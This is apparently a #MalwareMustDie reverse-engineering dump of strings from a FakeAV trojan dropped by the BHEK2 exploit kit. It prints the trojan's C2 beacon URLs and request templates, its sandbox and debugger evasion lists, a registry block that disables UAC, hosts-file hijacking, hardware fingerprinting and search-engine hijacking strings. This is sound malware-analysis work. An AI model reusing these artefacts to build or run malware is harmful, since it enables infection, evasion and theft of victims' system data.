#malwareMustDie - BHEK2 dropped FAkeAV Trojan 20121219

1. =======================================
2. #malwareMustDie - BHEK2 dropped FAkeAV Trojan
3. Reversing Analysis
4. References: https://www.virustotal.com/file/72d25f65ba822eb314a43321546ccf698a4b30e51f37406c27846671543e621f/analysis/
5. References: http://blog.dynamoo.com/2012/12/malware-sites-to-block-191212.html
6. @unixfreaxjp ~]$ date
7. Thu Dec 20 01:26:55 JST 2012
8. =============================
9.  
10. Trojan sent parameter formats:
11.  
12. HTTP/1.1 GET hxxp://report.aaa.com/?I55520=%96%C7%A5%A2%D7%ABclj%98%D4i%9E%9Ffi%98m%A2gneg%C7%A8%D1%AE%99%97egh%A9%8B%E7%E5%AF%EB%A4%8D%85%5B%E8%9E%C9%A6jkmn%97%A1%A3%9Ck%D5%E4%9A%9B%8A%5B%A2%9B%94%AF%A9%A9%A3%A3%AAfmxf%ACx%9C%AFj%7Bzz%A2nmna%99%A4%9E%82iwwfa%A5%8B%E2%D4%E5%B1_eee%A3g%95%99eeef%A1eee%5E%93%9F%9Do%ABreb%60%A2%95%A1%B4%A7%98"
13.  
14. Where "report.aaa.com" was resolved in the IP in jotted in the malicious hosts file.
15. After self copied and deletion, the trojan activities are reversed as followings:
16.  
17. // Registry aimed/coded to be searched...
18.  
19. SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform\
20. SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform\
21. Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\
22.  
23.  
24. // Detecting below software....
25. // if softwares is detected the trojan won't run properly..
26.  
27. // filename....
28. cv.exe
29. irise.exe
30. IrisSvc.exe
31. wireshark.exe
32. dumpcap.exe
33. ZxSniffer.exe
34. Aircrack-ng Gui.exe
35. observer.exe
36. tcpdump.exe
37. WinDump.exe
38. wspass.exe
39. Regshot.exe
40. ollydbg.exe
41. PEBrowseDbg.exe
42. windbg.exe
43. DrvLoader.exe
44. SymRecv.exe
45. Syser.exe
46. apis32.exe
47. VBoxService.exe
48. VBoxTray.exe
49. SbieSvc.exe
50. SbieCtrl.exe
51. SandboxieRpcSs.exe
52. SandboxieDcomLaunch.exe
53. SUPERAntiSpyware.exe
54. ERUNT.exe
55. ERDNT.exe
56. EtherD.exe
57. Sniffer.exe
58. CamtasiaStudio.exe
59. CamRecorder.exe
60. Software\CommView
61. // registry...
62. SYSTEM\CurrentControlSet\Services\IRIS5
63. Software\eEye Digital Security
64. SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Wireshark
65. SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\wireshark.exe
66. SOFTWARE\ZxSniffer
67. SOFTWARE\Cygwin
68. SOFTWARE\Cygwin
69. SOFTWARE\B Labs\Bopup Observer
70. AppEvents\Schemes\Apps\Bopup Observer
71. Software\B Labs\Bopup Observer
72. SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Win Sniffer_is1
73. Software\Win Sniffer
74. SOFTWARE\Classes\PEBrowseDotNETProfiler.DotNETProfiler
75. Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\Debugging Tools for Windows (x86)
76. SYSTEM\CurrentControlSet\Services\SDbgMsg
77. Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\APIS32
78. Software\Syser Soft
79. SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APIS32
80. SOFTWARE\APIS32
81. SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest Additions
82. SYSTEM\CurrentControlSet\Services\VBoxGuest
83. SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sandboxie
84. SYSTEM\CurrentControlSet\Services\SbieDrv
85. Software\Classes\Folder\shell\sandbox
86. Software\Classes\*\shell\sandbox
87.  
88.  
89.  
90. // This is what this software will put in...
91. SOFTWARE\SUPERAntiSpyware.com
92. SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASCon.1
93. SOFTWARE\SUPERAntiSpyware.com
94. SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ERUNT_is1
95.  
96. // Using DNSAPI.dll calls
97. DnsFlushResolverCache
98.  
99. // Using orig WS2_32.dll
100. WSAWaitForMultipleEvents
101. WSACreateEvent
102. WSAEventSelect
103. WSACloseEvent
104.  
105. // WININET.dll
106. DeleteUrlCacheEntryW
107. InternetConnectA
108. InternetQueryDataAvailable
109. InternetReadFile
110. HttpSendRequestW
111. HttpOpenRequestA
112. HttpAddRequestHeadersA
113. InternetOpenA
114. InternetCloseHandle
115.  
116. //iphlpapi.dll
117. GetAdaptersInfo
118.  
119. // KERNEL32.dll
120. eTime
121. DeleteFileW
122. CreateThread
123. ExpandEnvironmentStringsW
124. CreateFileA
125. MoveFileExA
126. GetFileAttributesA
127. CreateDirectoryA
128. SetFileAttributesA
129. DeleteFileA
130. FindFirstFileW
131. GetVolumeInformationA
132. GetVersionExW
133. FindClose
134. DeviceIoControl
135. ExpandEnvironmentStringsA
136. CopyFileA
137. FindFirstFileA
138. FindNextFileA
139. WaitForSingleObjectEx
140. lstrcatW
141. GetTempFileNameW
142. MoveFileExW
143. WriteFile
144. ReadFile
145. CreateFileW
146. GetTempPathW
147. GetLocaleInfoA
148. GetVolumeInformationW
149. HeapAlloc
150. HeapFree
151. GetProcessHeap
152. LocalAlloc
153. CreateRemoteThread
154. OpenProcess
155. VirtualAllocEx
156. ProcessIdToSessionId
157. LocalFree
158. WriteProcessMemory
159. InterlockedDecrement
160. SetEndOfFile
161. GetFileSize
162. SetFilePointer
163. GetTickCount
164.  
165. // USER32.dll
166. FindWindowA
167. DispatchMessageW
168. CreateDialogParamW
169. ShowWindow
170. EndDialog
171. ReleaseDC
172. MessageBoxA
173. IsDialogMessageW
174. TranslateMessage
175. GetDC
176. wsprintfW
177. BeginPaint
178. SendMessageA
179. KillTimer
180. PostQuitMessage
181. GetMessageW
182. SetTimer
183. DestroyWindow
184. EndPaint
185. wsprintfA
186.  
187. // GDI32.dll
188. GetObjectA
189. GetObjectW
190. CreateCompatibleBitmap
191. CreateCompatibleDC
192. SelectObject
193. DeleteDC
194. BitBlt
195.  
196. // ADVAPI32.dll
197. RegSetValueExA
198. RegQueryValueExA
199. RegEnumKeyExA
200. RegOpenKeyExA
201. RegQueryInfoKeyA
202. GetUserNameA
203. RegCloseKey
204. RegCreateKeyExW
205. AllocateAndInitializeSid
206. RegEnumValueW
207. FreeSid
208. CheckTokenMembership
209. RegSetValueExW
210. InitializeSecurityDescriptor
211. SetSecurityDescriptorDacl
212. RegCreateKeyExA
213. InitializeAcl
214. AddAccessAllowedAce
215. RegEnumValueA
216. SetFileSecurityA
217. CreateServiceW
218. CloseServiceHandle
219. OpenSCManagerW
220. StartServiceW
221. RegQueryValueExW
222. RegOpenKeyExW
223.  
224. // SHELL32.dll
225. ShellExecuteW
226. CommandLineToArgvW
227. SHChangeNotify
228.  
229. //OLEAUT32.dll
230. CoUninitialize
231. CreateStreamOnHGlobal
232. CoInitialize
233. CoCreateInstance
234. CoInitializeSecurity
235. CoInitializeEx
236. ole32.dll
237.  
238. // ntdll.dll
239. NtConnectPort
240. NtRequestWaitReplyPort
241. RtlNtStatusToDosError
242. NtClose
243. NtDelayExecution
244. NtCreateSection
245. NtQuerySystemTime
246.  
247.  
248. // urlmon.dll
249. EnumProcesses
250. GetProcessImageFileNameW
251. PSAPI.DLL
252. URLDownloadToFileW
253.  
254. // Data to be prepared & passed to server/C2
255. Cache-Control:
256. Connection:
257. Date:
258. Pragma:
259. Transfer-Encoding:
260. Upgrade:
261. Via:
262. Age:
263. Location:
264. Proxy-Authenticate:
265. Public:
266. Retry-After:
267. Server:
268. Vary:
269. Warning:
270. WWW-Authenticate:
271. Content-Length:
272. Transfer-Encoding:
273.  
274. ========================================
275. First CNC comm structure (reversed code)
276. ========================================
277.  
278. // The structure of the C2 URL DOWNLOAD....
279. update%s.%s.com
280.  
281. // random seed chars...
282. // + assembly of urls Pseudorandom...
283.  
284. abcdefghijklmnopqrstuvwxyz0123456789
285. $%s&%s%s$
286. ?%c%c=%s
287.  
288. // requested HTTP 1st download structure (begins w/ the user-agent)
289.  
290. Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
291. GET
292. Host: %s
293.  
294. ====================
295. second comm
296. ===================
297. // how the encrypted info sent & its generator strings:
298.  
299. $%s&controller=sign&data=%s&mid=%s$
300. ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
301.  
302. // here we go...
303. GET %s?%s HTTP/1.1
304. Host: %s
305. User-Agent: %s
306.  
307. // accepted communication user-agent (marked the .NET)
308. Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
309. Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
310.  
311. // sending infected PC category
312. POST %s HTTP/1.1
313. Host: %s
314. User-Agent: %s
315. Content-Length: %d
316. Content-Type: application/x-www-form-urlencoded
317.  
318.  
319. // possibility checked OS + followed strings....
320. wvNT
321. wv2k
322. wvME
323. wvXP
324. wv2k3
325. wvVista
326. wv2k8
327. wvUnknown
328.  
329. // this could be version of OS..
330. %.08X%.08X%.08X%.08X
331. %.01d%.03d%.03d%.03d%.02d%.08X
332. wv=%s&uid=%d&lng=%s&mid=%s&res=%s&v=%08X
333.  
334. //possibility domains structure:
335. report.*
336. *.com
337. *.cfgbin
338.  
339.  
340. // requested data
341. HTTP/1.1
342. GET
343. Host: update1.randomstring.com <======= //noted this....
344. User-Agent: IE7
345. /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3
346. HTTP/1.1
347. HEAD
348. Host: update1.randomstring.com
349. User-Agent: IE7
350. <input type="hidden" name="%[^"]" value="%[^"] ">
351. HTTP/1.1
352. /update_c1eec.exe
353. POST
354. Host: update1.randomstring.com
355. User-Agent: IE7
356. /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3
357. HTTP/1.1
358. GET
359. Host: update1.randomstring.com
360. User-Agent: IE7
361. Data Buffer
362. Build/13.0
363. patch:0
364. Version/10.0
365. ver:2.0
366. update/0
367. Mod/0
368. Service 1.0
369. lib/5.0
370. Library1.0
371. App/7.0
372. compat/0
373. feed/7.1.0
374. system:3.0
375. control/5.0
376. Engine/4.0
377. runtime 11.0
378. layout/2.0
379. Build/14.0
380. patch:10
381. Version/11.0
382. ver:3.0
383. update/10
384. Mod/3.0
385. Service 2.0
386. lib/6.0
387. Library2.0
388. App/8.0
389. compat/4.1.0
390. feed/7.2.0
391. system:4.0
392. control/6.0
393. Engine/5.0
394. runtime 12.0
395. layout/3.0
396. Build/15.0
397. patch:20
398. Version/12.0
399. ver:4.0
400. update/20
401. Mod/4.0
402. Service 3.0
403. lib/7.0
404. Library3.0
405. App/9.0
406. compat/4.2.0
407. feed/7.3.0
408. system:5.0
409. control/7.0
410. Engine/6.0
411. runtime 13.0
412. layout/4.0
413. AppData
414. \Mozilla\Firefox\Profiles\
415. \prefs.js
416. user_pref ( " general.useragent.extra.%[^"] " , " %[^"] " ) ;
417. user_pref("general.useragent.extra.%s", "%s"); <=== // and this....
418.  
419. // FakeAlert To be stored path...
420. %appdata%\ScanDisc.exe
421. %appdata%
422. %s\%X.reg
423. %s\mcp.ico
424.  
425. // Making shortcuts...
426. %s\mcp.ico
427. shortcut
428. shortcut
429. My Computer
430. .mcp
431.  
432. //registry to be written:
433. Windows Registry Editor Version 5.00
434. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
435. "ConsentPromptBehaviorAdmin"=dword:0
436. "ConsentPromptBehaviorUser"=dword:0
437. "EnableLUA"=dword:0
438. [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows]
439. "update"="%s"
440. Error opening file
441. Size of file: %ld bytes.
442. DEFAULT_PCID
443. Unknown__
444. Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\
445. SusClientId
446. Unknown__
447. Software\Microsoft\Windows NT\CurrentVersion\
448. ProductId
449. Unknown__
450. Unknown__
451.  
452. // this is nasty.... son of the B'&%('&%( are grepping storage data...
453. \\.\PhysicalDrive%d
454. \\.\PhysicalDrive%d
455. \\.\PhysicalDrive%d
456. \\.\IDE21201.VXD
457. \\.\Scsi%d:
458. SCSIDISK
459. Drive%dModelNumber
460. Drive%dSerialNumber
461. Drive%dControllerRevisionNumber
462. Drive%dControllerBufferSize
463. Drive%dType
464. Removable
465. Fixed
466. Unknown
467. WD-W
468. IBM-
469. MAXTOR
470. Maxtor
471. WDC
472. %02X%02X%02X%02X%02X%02X
473. InstallDate
474. Software\Microsoft\Windows NT\CurrentVersion
475. InstallDate = %X
476.  
477. // overwrite the hosts file...
478. C:\Windows\system32\drivers\etc\hosts
479.  
480. //seek online source for hosts info...
481. google-analytics
482. http://findgala.com/?&uid=%d&q={searchTerms}
483.  
484. // there goes thenew hosts structure wth new
485. // %d.%d.%d.%d to be overwrite...
486.  
487. C:\Windows\system32\drivers\etc\hosts.txt
488. # Copyright (c) 1993-2006 Microsoft Corp.
489. # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
490. # This file contains the mappings of IP addresses to host names. Each
491. # entry should be kept on an individual line. The IP address should
492. # be placed in the first column followed by the corresponding host name.
493. # The IP address and the host name should be separated by at least one
494. # space.
495. # Additionally, comments (such as these) may be inserted on individual
496. # lines or following the machine name denoted by a '#' symbol.
497. # For example:
498. # 102.54.94.97 rhino.acme.com # source server
499. # 38.25.63.10 x.acme.com # x client host
500. 127.0.0.1 localhost
501. ::1 localhost
502. # Copyright (c) 1993-2006 Microsoft Corp.
503. # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
504. # This file contains the mappings of IP addresses to host names. Each
505. # entry should be kept on an individual line. The IP address should
506. # be placed in the first column followed by the corresponding host name.
507. # The IP address and the host name should be separated by at least one
508. # space.
509. # Additionally, comments (such as these) may be inserted on individual
510. # lines or following the machine name denoted by a '#' symbol.
511. # For example:
512. # 102.54.94.97 rhino.acme.com # source server
513. # 38.25.63.10 x.acme.com # x client host
514. 127.0.0.1 localhost
515. ::1 localhost
516. %d.%d.%d.%d
517.  
518.  
519. //Now making a mess with your IE search settings
520.  
521. \Software\Microsoft\Internet Explorer\SearchScopes
522. DefaultScope
523. URL
524. \searchplugins\
525. search.xml
526. <ShortName>search</ShortName>
527. <SearchPlugin xmlns="http://www.mozilla.org/2006/browser/search/">
528. <Description>Search for the best price.</Description>
529. <InputEncoding>windows-1251</InputEncoding>
530. http://findgala.com/?
531. <Url type="text/html" method="GET" template="%s">
532. <Image width="16" height="16">data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAaRJREFUeNpiVIg5JRURw0A0YAHio943kYV%2B%2Ff33%2BdvvX7%2F%2FMjEx8nKycrGzwKXOiPKzICvdeezLhCV3jp15%2Bfv%2FX0YGhv8MDDxMX2qKTIw0RK10eYD6QYqATvoPBkt3f5K0W9Ew4fjTFz%2F%2Bw8Dm3W8UPeZxqFa%2BevsFyD0twgfVsOfkRxHrtfV9u5BVQ8Crd98%2FffkGYQM1QJ20%2FfSPv79eNxQGYfpSVJADmcvEAHbr7oOX2dj%2FERNKIA2%2F%2F%2Fz%2FxfCDhYVoDUDw5P6vf9%2B5iY0HVmZGQWm%2BN3fff%2Fn2k4eLHS739x%2FDiRs%2Ff%2F%2F5x8HO%2FOHzN3djfqgNjIwMgc6qzLx%2Fpy47j2zY%2Feff06tXhOUucgxeun33AUZGpHh4%2Bvo7t8EyIJqz%2FhpasD59%2B5dNrqdnznZIsEL9ICXCsWuBCwvTv%2FymS5PWPP32ExEALz%2F%2BB5r848cPCJcRaMP9xaYQzofPPzfuvrnj0Jst%2B5%2F8%2Bc4sLPeDkYlRgJc93VPE18NIXkYUmJYQSQMZ%2FP3379uPH7%2F%2F%2FEETBzqJ0WqLGvFpe2LCC4AAAwAyjg7ENzDDWAAAAABJRU5ErkJggg%3D%3D</Image>
533. <Param name="q" value="{searchTerms}"/>
534. <Param name="uid" value="%d"/>
535. </Url>
536. </SearchPlugin>
537. search
538. \prefs.js.bak
539. browser.search.selectedEngine
540. user_pref("browser.search.selectedEngine", "%s");
541. user_pref("browser.search.selectedEngine", "%s");
542. http://findgala.com/?&uid=%d&q={searchTerms}
543. /chrome/report.html
544. www.bing.com
545.  
546.  
547. // Some uninstall info...
548. Software\Microsoft\Windows\CurrentVersion\Uninstall
549. SystemComponent
550. ParentKeyName
551. OperatingSystem
552. DisplayName
553.  
554. // Additional on innstalled save data path...
555.  
556. c:\cgvi5r6i\vgdgfd.72g
557. C:\file.exe
558.  
559.  
560. ----
561. #MalwareMustDie!!